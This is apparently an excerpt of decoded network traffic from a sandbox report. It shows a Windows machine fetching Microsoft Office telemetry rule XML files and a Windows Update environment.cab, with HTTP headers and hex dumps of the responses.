                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            112192.168.2.56196513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:42 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                            x-ms-request-id: 527b7663-001e-00ad-545f-2e554b000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133942Z-17df447cdb5vp9l9hC1DFW0nrw000000030g0000000082h8
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:42 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            113192.168.2.56196713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:43 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                            x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133943Z-16547b76f7fcrtpchC1DFW52e800000006rg00000000ab17
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            114192.168.2.56197513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:43 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                            x-ms-request-id: 0a7a2f72-a01e-0002-3b58-2e5074000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133943Z-15869dbbcc68l9dbhC1DFWc5xw00000001kg00000000612y
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            115192.168.2.56197613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:43 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                            x-ms-request-id: 4bf7326f-801e-00ac-6855-2efd65000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133943Z-15869dbbcc6khw88hC1DFWh5f4000000079g0000000008m6
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            116192.168.2.56197813.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:43 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1427
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                            x-ms-request-id: a0cc50e9-d01e-0066-4e5c-2eea17000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133943Z-15869dbbcc6b69h9hC1DFWaf7800000001n0000000002d7t
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            117192.168.2.5619704.175.87.197443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XPVFHs15PCyFd6Z&MD=YnMZZMZu HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                            MS-CorrelationId: a383dc01-d033-42b2-a712-85e356e63b3c
                                                                                                                                                                                                                            MS-RequestId: 294d7218-5d93-4bf8-9317-426e751128d5
                                                                                                                                                                                                                            MS-CV: DCI4X6z/YEe7NLo7.0
                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:43 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Content-Length: 30005
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            118192.168.2.56198113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:43 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:44 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1390
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                            x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133944Z-16547b76f7fmbrhqhC1DFWkds800000006q000000000e0xz
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            119192.168.2.56198413.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:44 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1401
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                            x-ms-request-id: c6a80355-b01e-0070-0e08-2c1cc0000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133944Z-16547b76f7fcrtpchC1DFW52e800000006n000000000gg3f
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            120192.168.2.56198513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:44 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 1364
                                                                                                                                                                                                                            Connection: close
